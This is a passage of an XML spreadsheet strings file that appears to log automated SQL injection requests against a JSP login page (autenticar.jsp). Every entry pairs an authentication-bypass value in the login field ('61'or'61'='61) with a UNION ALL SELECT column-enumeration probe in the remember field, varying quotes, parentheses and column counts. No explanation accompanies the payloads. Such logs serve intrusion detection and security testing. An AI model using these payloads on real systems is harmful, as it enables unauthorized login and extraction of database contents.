    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((("yddr"="yddr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((("jlfu"="jlfu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((("wnue"="wnue&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null--and"vtpt"="vtpt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null--and"fvmd"="fvmd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null--and"zkoj"="zkoj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null--and"tlie"="tlie&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and"qipy"="qipy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and"gotn"="gotn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and"jtec"="jtec&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and"wwuq"="wwuq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and"syhm"="syhm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and"jpow"="jpow&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null--and("ldtt"like"ldtt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null--and("omre"like"omre&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null--and("nspx"like"nspx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null--and("uodp"like"uodp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and("flas"like"flas&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and("qodx"like"qodx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and("nmfu"like"nmfu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and("gmyc"like"gmyc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and("enlo"like"enlo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and("nrxz"like"nrxz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null--and(("mkzq"like"mkzq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null--and(("yzyx"like"yzyx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null--and(("diag"like"diag&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null--and(("akpt"like"akpt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(("wgnp"like"wgnp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(("molg"like"molg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(("mhmr"like"mhmr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(("bmux"like"bmux&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(("qqtu"like"qqtu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(("kwqc"like"kwqc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null--and((("uvty"like"uvty&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null--and((("bxbn"like"bxbn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null--and((("pald"like"pald&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null--and((("jjoi"like"jjoi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((("hzeq"like"hzeq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((("jdeu"like"jdeu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((("ghne"like"ghne&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((("jpov"like"jpov&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((("qugw"like"qugw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((("bcpa"like"bcpa&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null--and"yuhg"like"yuhg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null--and"tmme"like"tmme&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null--and"bsmi"like"bsmi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null--and"awam"like"awam&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and"xmgw"like"xmgw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and"cffr"like"cffr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and"yxsw"like"yxsw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and"ompg"like"ompg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and"ohqi"like"ohqi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and"ptjr"like"ptjr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect8585,8585,8585,8585,8585,8585,8585,8585,8585,8585,8585--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect3180,3180,3180,3180,3180,3180,3180,3180,3180,3180,3180,3180--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect9572,9572,9572,9572,9572,9572,9572,9572,9572,9572,9572,9572,9572--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect2849,2849,2849,2849,2849,2849,2849,2849,2849,2849,2849,2849,2849,2849--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect2018,2018,2018,2018,2018,2018,2018,2018,2018,2018,2018,2018,2018,2018,2018--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect1321,1321,1321,1321,1321,1321,1321,1321,1321,1321,1321,1321,1321,1321,1321,1321--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect6129,6129,6129,6129,6129,6129,6129,6129,6129,6129,6129,6129,6129,6129,6129,6129,6129--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect6721,6721,6721,6721,6721,6721,6721,6721,6721,6721,6721,6721,6721,6721,6721,6721,6721,6721--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect3578,3578,3578,3578,3578,3578,3578,3578,3578,3578,3578,3578,3578,3578,3578,3578,3578,3578,3578--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect4256,4256,4256,4256,4256,4256,4256,4256,4256,4256,4256,4256,4256,4256,4256,4256,4256,4256,4256,4256--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect5845,5845,5845,5845,5845,5845,5845,5845,5845,5845,5845--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect5960,5960,5960,5960,5960,5960,5960,5960,5960,5960,5960,5960--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect3147,3147,3147,3147,3147,3147,3147,3147,3147,3147,3147,3147,3147--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect5805,5805,5805,5805,5805,5805,5805,5805,5805,5805,5805,5805,5805,5805--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect1309,1309,1309,1309,1309,1309,1309,1309,1309,1309,1309,1309,1309,1309,1309--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect7922,7922,7922,7922,7922,7922,7922,7922,7922,7922,7922,7922,7922,7922,7922,7922--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect3572,3572,3572,3572,3572,3572,3572,3572,3572,3572,3572,3572,3572,3572,3572,3572,3572--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect7744,7744,7744,7744,7744,7744,7744,7744,7744,7744,7744,7744,7744,7744,7744,7744,7744,7744--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect1652,1652,1652,1652,1652,1652,1652,1652,1652,1652,1652,1652,1652,1652,1652,1652,1652,1652,1652--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect9802,9802,9802,9802,9802,9802,9802,9802,9802,9802,9802,9802,9802,9802,9802,9802,9802,9802,9802,9802--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect3821,3821,3821,3821,3821,3821,3821,3821,3821,3821,3821--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect6849,6849,6849,6849,6849,6849,6849,6849,6849,6849,6849,6849--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect7854,7854,7854,7854,7854,7854,7854,7854,7854,7854,7854,7854,7854--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect2139,2139,2139,2139,2139,2139,2139,2139,2139,2139,2139,2139,2139,2139--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect9328,9328,9328,9328,9328,9328,9328,9328,9328,9328,9328,9328,9328,9328,9328--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect9745,9745,9745,9745,9745,9745,9745,9745,9745,9745,9745,9745,9745,9745,9745,9745--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect7009,7009,7009,7009,7009,7009,7009,7009,7009,7009,7009,7009,7009,7009,7009,7009,7009--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect1566,1566,1566,1566,1566,1566,1566,1566,1566,1566,1566,1566,1566,1566,1566,1566,1566,1566--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect8886,8886,8886,8886,8886,8886,8886,8886,8886,8886,8886,8886,8886,8886,8886,8886,8886,8886,8886--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect2349,2349,2349,2349,2349,2349,2349,2349,2349,2349,2349,2349,2349,2349,2349,2349,2349,2349,2349,2349--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect7950,7950,7950,7950,7950,7950,7950,7950,7950,7950,7950--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect6904,6904,6904,6904,6904,6904,6904,6904,6904,6904,6904,6904--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect984,984,984,984,984,984,984,984,984,984,984,984,984--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect3981,3981,3981,3981,3981,3981,3981,3981,3981,3981,3981,3981,3981,3981--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect7117,7117,7117,7117,7117,7117,7117,7117,7117,7117,7117,7117,7117,7117,7117--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect4576,4576,4576,4576,4576,4576,4576,4576,4576,4576,4576,4576,4576,4576,4576,4576--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect3906,3906,3906,3906,3906,3906,3906,3906,3906,3906,3906,3906,3906,3906,3906,3906,3906--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect5026,5026,5026,5026,5026,5026,5026,5026,5026,5026,5026,5026,5026,5026,5026,5026,5026,5026--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect3420,3420,3420,3420,3420,3420,3420,3420,3420,3420,3420,3420,3420,3420,3420,3420,3420,3420,3420--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect602,602,602,602,602,602,602,602,602,602,602,602,602,602,602,602,602,602,602,602--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect1273,1273,1273,1273,1273,1273,1273,1273,1273,1273,1273--and(6968=6968&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect8153,8153,8153,8153,8153,8153,8153,8153,8153,8153,8153,8153--and(6186=6186&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect6728,6728,6728,6728,6728,6728,6728,6728,6728,6728,6728,6728,6728--and(5399=5399&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect6713,6713,6713,6713,6713,6713,6713,6713,6713,6713,6713,6713,6713,6713--and(6589=6589&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect9430,9430,9430,9430,9430,9430,9430,9430,9430,9430,9430,9430,9430,9430,9430--and(5643=5643&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect3626,3626,3626,3626,3626,3626,3626,3626,3626,3626,3626,3626,3626,3626,3626,3626--and(8180=8180&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect9201,9201,9201,9201,9201,9201,9201,9201,9201,9201,9201,9201,9201,9201,9201,9201,9201--and(3558=3558&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect2571,2571,2571,2571,2571,2571,2571,2571,2571,2571,2571,2571,2571,2571,2571,2571,2571,2571--and(1649=1649&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect5299,5299,5299,5299,5299,5299,5299,5299,5299,5299,5299,5299,5299,5299,5299,5299,5299,5299,5299--and(1631=1631&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect2021,2021,2021,2021,2021,2021,2021,2021,2021,2021,2021,2021,2021,2021,2021,2021,2021,2021,2021,2021--and(1718=1718&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect5637,5637,5637,5637,5637,5637,5637,5637,5637,5637,5637--and((7269=7269&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect692,692,692,692,692,692,692,692,692,692,692,692--and((63=63&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect1887,1887,1887,1887,1887,1887,1887,1887,1887,1887,1887,1887,1887--and((5839=5839&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect3216,3216,3216,3216,3216,3216,3216,3216,3216,3216,3216,3216,3216,3216--and((617=617&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect3660,3660,3660,3660,3660,3660,3660,3660,3660,3660,3660,3660,3660,3660,3660--and((6533=6533&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect8736,8736,8736,8736,8736,8736,8736,8736,8736,8736,8736,8736,8736,8736,8736,8736--and((4772=4772&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect7213,7213,7213,7213,7213,7213,7213,7213,7213,7213,7213,7213,7213,7213,7213,7213,7213--and((6530=6530&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect9483,9483,9483,9483,9483,9483,9483,9483,9483,9483,9483,9483,9483,9483,9483,9483,9483,9483--and((1038=1038&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect497,497,497,497,497,497,497,497,497,497,497,497,497,497,497,497,497,497,497--and((1221=1221&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect1483,1483,1483,1483,1483,1483,1483,1483,1483,1483,1483,1483,1483,1483,1483,1483,1483,1483,1483,1483--and((9839=9839&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect328,328,328,328,328,328,328,328,328,328,328--and(((5369=5369&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect1805,1805,1805,1805,1805,1805,1805,1805,1805,1805,1805,1805--and(((7542=7542&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect1827,1827,1827,1827,1827,1827,1827,1827,1827,1827,1827,1827,1827--and(((6351=6351&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect1759,1759,1759,1759,1759,1759,1759,1759,1759,1759,1759,1759,1759,1759--and(((788=788&amp;modo=entrar</t>
  </si>
  <si>
